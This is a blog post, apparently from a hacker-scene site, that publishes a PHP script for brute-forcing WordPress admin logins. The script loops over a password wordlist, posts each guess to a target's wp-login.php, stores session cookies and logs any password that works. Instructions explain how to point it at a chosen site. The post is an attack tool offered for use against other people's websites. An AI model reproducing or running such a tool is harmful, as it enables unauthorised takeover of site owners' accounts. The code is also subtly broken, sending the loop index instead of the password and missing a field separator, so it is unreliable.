Sign by xXx - xXx Rulez

[l33t]PHP Wordpress Brute Forcer  



ignore_user_abort(1);
set_time_limit(0);
$url = "http://XXXX.com/wp-login.php"; //<- Put wordpress site name here
$user = "admin"; // <- Default username in wordpress. Almost you don't need to change it for most sites.
// <- password list file, put file in same folder where you put this file
$cookie = realpath("cookie.txt"); // <- Cookie file. If you get logged in admin panel, In this script will save cookies.
$success = "success.txt"; // <- If you get success to login, In this file password will be stored.
$line = file("mil-dic.txt");
foreach ($line as $pwd => $line) {



$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "log=admin&pwd=".$pwd."rememberme=forever&wp-submit=Log+In&redirect_to=wp-admin%2F&testcookie=1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);


if (preg_match("/Dashboard/i", $postResult)) {
echo "Congo! You are logged now, Password is :- " . $pwd . "";
$fp = fopen("success.txt","a");
fwrite($fp,$pwd);
fclose($fp);
die();
}

else
{ echo "Passowrd wrong
";

}

}

?>





In line no 4, add url of site which you want to brute.
Make two txt files and add 777 permissions to them if you are running on linux.
- cookie.txt
- success.txt
Change path of file containing passwords to brute in line no 9



credit:- AbaaS

This entry was posted on 11:56 AM and is filed under . You can leave a response and follow any responses to this entry through the Subscribe to: Post Comments (Atom) .

1 comments

Label Cloud

Blogumulus by Roy Tanck and Amanda Fazani

Your Ad Here